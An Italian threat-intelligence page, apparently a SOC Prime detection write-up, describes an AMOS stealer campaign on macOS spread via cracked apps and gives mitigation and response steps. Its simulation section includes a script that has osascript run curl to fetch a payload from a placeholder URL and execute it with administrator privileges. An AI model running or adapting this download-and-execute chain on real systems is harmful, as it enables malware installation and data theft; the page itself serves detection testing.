SOC Prime Bias: Medio

08 May 2026 15:45 UTC

AMOS Stealer Attacca macOS Attraverso App “Craccate”

Author Photo
SOC Prime Team linkedin icon Segui
AMOS Stealer Attacca macOS Attraverso App “Craccate”
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riepilogo

Il report descrive una campagna che distribuisce Atomic macOS Stealer (AMOS) camuffandolo da applicazioni crackate o istruendo gli utenti a eseguire comandi terminal copiati e incollati. Una volta eseguito, il malware raccoglie un ampio set di dati sensibili, incluse credenziali, informazioni del browser, portafogli di criptovaluta, file delle applicazioni di messaggistica, profili VPN e documenti personali, per poi esfiltrare i contenuti rubati tramite HTTP o HTTPS. Per evitare il rilevamento statico, gli operatori ruotano i domini e gli URL durante la campagna. L’attività è indirizzata agli utenti macOS, in particolare a quelli che cercano software non ufficiali o piratati.

Indagine

La telemetria di Trend Vision One è stata utilizzata per ricostruire l’intera catena di infezione, iniziando con i download di applicazioni crackate da haxmac.cc, seguiti da reindirizzamenti attraverso domini intermediari, esecuzione di script shell dannosi, creazione di daemon di avvio per la persistenza, staging dei dati in /tmp, compressione in archivi ZIP ed esfiltrazione verso domini rotanti controllati dagli attaccanti. I ricercatori hanno catturato le linee di comando rilevanti, i percorsi dei file e gli indicatori comportamentali associati a ciascuna fase della compromissione.

Mitigazione

Le organizzazioni dovrebbero educare gli utenti sui rischi del software crackato e dei comandi terminal copiati e incollati, applicare i controlli Gatekeeper e notarizzazione, e limitare l’esecuzione di script non necessari sui sistemi macOS. I difensori dovrebbero anche monitorare attività sospette di curl and osascript e bloccare l’accesso a domini e indirizzi IP noti come dannosi. Le rilevazioni degli endpoint dovrebbero concentrarsi sulla creazione non autorizzata di daemon di avvio, il posizionamento nascosto di file e comportamenti insoliti di raccolta o esfiltrazione dei file.

Risposta

Se viene rilevata un’attività di AMOS, isolare l’endpoint interessato, terminare i processi dannosi, rimuovere file nascosti come .helper, .agent, e com.finder.helper.plist, e cancellare qualsiasi dato preparato per l’esfiltrazione. Le credenziali compromesse devono essere revocate e un’analisi forense dovrebbe essere effettuata su qualsiasi archivio recuperato. L’infrastruttura dannosa identificata deve essere bloccata e i contenuti di rilevazione devono essere aggiornati per monitorare i pattern di comando osservati.

Flusso di attacco

Esecuzione di Simulazione

Prerequisito: La verifica preliminare della telemetria e del baseline deve essere superata.

Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) designata per attivare la regola di rilevamento. I comandi e la narrativa DEVONO riflettere direttamente le TTP identificate e mirare a generare la telemetria esatta prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.

  • Narrativa dell’attacco e comandi:
    Un avversario ha ottenuto un’esca di phishing che consegna un breve payload AppleScript. Lo script utilizza osascript per eseguire un comando shell (sh -c) che invoca curl per scaricare il binario AMOS stealer da un server C2 dannoso, lo memorizza nella ~/Library/Application Support/ dell’utente, e poi lo esegue con permessi elevati. L’uso del osascript (un binario Apple firmato) maschera l’attività come automazione legittima, mentre curl fornisce un download di rete furtivo.

  • Script di Test di Regressione:

    # amos_stealer_simulation.sh
    # Simula l'esecuzione di AMOS stealer su macOS usando osascript + curl
    # 1. Definire URL dannoso (utilizzare un segnaposto innocuo per sicurezza)
    MALICIOUS_URL="https://example.com/malicious_payload.sh"
    # 2. AppleScript che esegue un comando shell per scaricare ed eseguire il payload
    APPLESCRIPT=$(cat <<'EOF'
    do shell script "sh -c 'curl -s -o /tmp/payload.sh "https://example.com/malicious_payload.sh" && chmod +x /tmp/payload.sh && /tmp/payload.sh'" with administrator privileges
    EOF
    )
    # 3. Eseguire l'AppleScript tramite osascript
    echo "$APPLESCRIPT" | osascript
    # 4. Pausa breve per consentire l'esecuzione del payload
    sleep 5
  • Comandi di Pulizia:

    # cleanup_amos_simulation.sh
    # Rimuove gli artefatti creati dalla simulazione
    # Rimuovere il payload scaricato
    rm -f /tmp/payload.sh
    # Revoca qualsiasi processo temporaneo con privilegi elevati (se ancora in esecuzione)
    pkill -f "/tmp/payload.sh" || true
    # Opzionalmente, cancellare la cronologia di esecuzione di AppleScript
    # (macOS non conserva una cronologia persistente per osascript)
    echo "Pulizia completata."